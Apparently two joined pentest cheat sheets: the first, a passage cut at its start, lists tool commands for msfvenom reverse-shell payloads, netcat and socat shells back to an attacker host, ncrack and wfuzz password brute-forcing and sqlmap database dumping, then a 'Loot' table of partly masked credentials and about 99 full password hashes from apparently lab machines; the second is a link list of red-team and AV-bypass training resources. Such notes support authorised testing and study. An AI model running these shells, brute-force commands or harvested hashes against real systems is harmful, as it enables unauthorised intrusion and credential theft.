-o reverse.php java war reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war windows javascript reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18 windows powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 linux reverse tcp shell elf shared object file: msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so ``` ### netcat [🡑](#tools) ``` bind: nc -lvp <attackerport> connect: nc -nv <targetip> <attackerport> reverse: nc -e /bin/bash <targetip> <attackerport> ``` ### ncrack [🡑](#tools) ``` bruteforce rdp login: ncrack -vv --user administrator -P passwords.txt rdp://<targetip> ``` ### netdiscover [🡑](#tools) ``` netdiscover -r 192.168.92.0/24 ``` ### nikto [🡑](#tools) ``` nikto -h http://<targetip> nikto -C all -h http://IP nikto -h <targetip> -useproxy http://<targetip>:3128 ``` ### nmap [🡑](#tools) ``` vulners nse script: https://github.com/vulnersCom/nmap-vulners searchsploit-like vuln scan: nmap --script vulners --script-args mincvss=5.0 <targetip> ping sweep: nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2 quick tcp: nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip> quick udp: nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip> full/intensive tcp: nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip> full/intensive udp: nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip> smb bruteforce: nmap --script=smb-brute.nse <targetip> nmap -sV -p 445 --script smb-brute <targetiprange> ``` ### openssl [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr) openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate ``` ### searchsploit [🡑](#tools) ``` nmap service scan output -> searchsploit: nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml ``` ### socat [🡑](#tools) ``` socat file:`tty`,raw,echo=0 tcp-listen:<attackerport> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport> ``` ### sqlmap [🡑](#tools) ``` avoid prompts, use defaults: sqlmap --batch read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan: sqlmap -r searchform.txt --dbs --batch sqlmap -r searchform.txt -D webapphacking --dump-all --batch post requests: sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST intrusive scans: sqlmap --level 5 --risk 3 list databses: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs list tables within a database: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables dump a table: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump blind sql enumeration: sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs ``` ### steghide [🡑](#tools) ``` steghide extract -sf file.jpg ``` ### unicornscan [🡑](#tools) ``` scan all 64k ports: unicornscan -vmT <targetip>:a scan first 1k ports: unicornscan -vmT <targetip>:p scan in udp mode: unicornscan -vmU <targetip> ``` ### wfuzz [🡑](#tools) ``` enumerate directories: wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php" wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ enumerate directories and filter on response length: wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ bruteforce password: bruteforce a single list: wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists: wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists, but faster: wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php ``` <a name="loot"></a> ## 🔥 Loot [↟](#contents) <a name="credentials"></a> ### 🔑 Credentials [🡑](#loot) | # | Username | Password | Type | |---|----------|----------|------| | 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` | | 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` | | 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` | | 4. | `Balrog` | `Mell..` | `ftp` | | 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` | | 6. | `john` | `MyNameIsJ...` | `liggoat` | | 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` | | 8. | `dreg` | `Mast..` | `lotuscms` | | 9. | `loneferret` | `starwa..` | `lotuscms` | | 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` | | 11. | `john` | `thiscannotb...` | `mysql` | | 12. | `wpdbuser` | `meErKa..` | `mysql` | | 13. | `mysql` | `mysql@12...` | `mysql` | | 14. | `admin` | `3298fj8323j80d....` | `mysql` | | 15. | `wordpress` | `Oscp1234..` | `mysql` | | 16. | `john` | `hiroshi..` | `mysql` | | 17. | `root` | `fuckey..` | `mysql` | | 18. | `Admin` | `TogieMYSQL123....` | `mysql` | | 19. | `root` | `darkshad..` | `mysql` | | 20. | `sql_svc` | `M3g4c0rp...` | `sql` | | 21. | `administrator` | `MEGACORP_4dm....` | `ssh` | | 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` | | 23. | `pi` | `raspber..` | `ssh` | | 24. | `fox` | `12345..` | `ssh` | | 25. | `eric` | `triscui..` | `ssh` | | 26. | `anne` | `prince..` | `ssh` | | 27. | `graham` | `GSo7isUM...` | `ssh` | | 28. | `root` | `1234.` | `ssh` | | 29. | `admin` | `thisisalsopw...` | `ssh` | | 30. | `fristigod` | `LetThereBeFri....` | `ssh` | | 31. | `dreg` | `Mast..` | `ssh` | | 32. | `loneferret` | `starwa..` | `ssh` | | 33. | `john` | `MyNameIsJ...` | `ssh` | | 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` | | 35. | `togie` | `1234.` | `ssh` | | 36. | `bob` | `secr..` | `ssh` | | 37. | `susan` | `MySuperS3cretVa....` | `ssh` | | 38. | `insecurity` | `P@ssw0..` | `ssh` | | 39. | `smeagol` | `MyPreciousR...` | `ssh` | | 40. | `Ori` | `span..` | `ssh` | | 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` | | 42. | `mark` | `5AYRft73VtFp....` | `ssh` | | 43. | `wpadmin` | `wpadm..` | `ssh` | | 44. | `root` | `rootpasswo...` | `ssh` | | 45. | `user` | `letme..` | `ssh` | | 46. | `tomcat` | `submitthisforpo....` | `tomcat` | | 47. | | `execrab..` | `truecrypt` | | 48. | `rascal` | `lov.` | `webapp` | | 49. | `user1` | `hell.` | `webapp` | | 50. | `user2` | `comman..` | `webapp` | | 51. | `user3` | `p@ssw0..` | `webapp` | | 52. | `test` | `testte..` | `webapp` | | 53. | `superadmin` | `Uncracka...` | `webapp` | | 54. | `test1` | `testte..` | `webapp` | | 55. | `admin` | `5afac8d8..` | `webapp` | | 56. | `john` | `66lajGGb..` | `webapp` | | 57. | `frodo` | `iwilltakethe....` | `webapp` | | 58. | `smeagol` | `MyPreciousR...` | `webapp` | | 59. | `aragorn` | `AndMySwo..` | `webapp` | | 60. | `legolas` | `AndMyB..` | `webapp` | | 61. | `gimli` | `AndMyA..` | `webapp` | | 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` | | 63. | `tom` | `spongeb..` | `webapp` | | 64. | `mark` | `snowfla..` | `webapp` | | 65. | `john` | `enig..` | `wordpress` | | 66. | `mark` | `helpdesk..` | `wordpress` | | 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` | | 68. | `admin` | `TogieMYSQL123....` | `wordpress` | | 69. | `elliot` | `ER28-06..` | `wordpress` | | 70. | `admin` | `admi.` | `wordpress` | <a name="hashes"></a> ### 🔑 Hashes [🡑](#loot) | # | Hash | |---|------| | 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` | | 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` | | 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` | | 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` | | 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` | | 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` | | 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` | | 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` | | 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` | | 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` | | 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` | | 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` | | 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` | | 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` | | 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` | | 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` | | 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` | | 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` | | 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` | | 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` | | 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` | | 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` | | 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` | | 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` | | 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` | | 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` | | 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` | | 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` | | 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` | | 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` | | 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` | | 32. | `john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` | | 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` | | 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` | | 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` | | 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` | | 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` | | 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` | | 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` | | 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` | | 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` | | 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` | | 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` | | 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` | | 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` | | 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` | | 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` | | 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` | | 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` | | 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` | | 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` | | 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` | | 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` | | 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` | | 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` | | 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` | | 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` | | 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` | | 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` | | 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` | | 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` | | 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` | | 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` | | 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` | | 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` | | 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` | | 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` | | 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` | | 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` | | 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` | | 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` | | 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` | | 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` | | 74. | `root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` | | 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` | | 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` | | 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` | | 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` | | 79. | `setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` | | 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` | | 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` | | 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` | | 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` | | 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` | | 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` | | 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` | | 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` | | 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` | | 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` | | 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` | | 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` | | 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` | | 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` | | 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` | | 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` | | 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` | | 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` | | 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` | | 99. | `www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
# Pentest notes Neat commands, code snippets and links to use during the tests. ## Table of Contents * [Free Trainings](#free-trainings) * [Red Teaming](#red-teaming) * [Clouds](#clouds) * [AppSec](#appsec) * [Protection and Hardening](#protection-and-hardening) ------ ## Free Trainings https://p.ost2.fyi/ https://github.com/ashemery/exploitation-course https://pwn.college/ https://github.com/fozavci/WeaponisingCSharp-Fundamentals https://pythonforcybersecurity.com/courses/python3-for-infosec-professionals/ https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training https://portswigger.net/web-security https://github.com/rootsecdev/Azure-Red-Team https://malwareunicorn.org/workshops/re101.html#0 https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp https://pre.empt.dev/ https://0xpat.github.io/ ## Awesome labs https://github.com/frankwxu/digital-forensics-lab ## Red Teaming ### Cheat sheets / Articles https://github.com/infosecn1nja/AD-Attack-Defense https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet https://github.com/infosecn1nja/Red-Teaming-Toolkit https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/amp/ https://recipeforroot.com/bonus-linux-commands/ https://mobile.twitter.com/DirectoryRanger 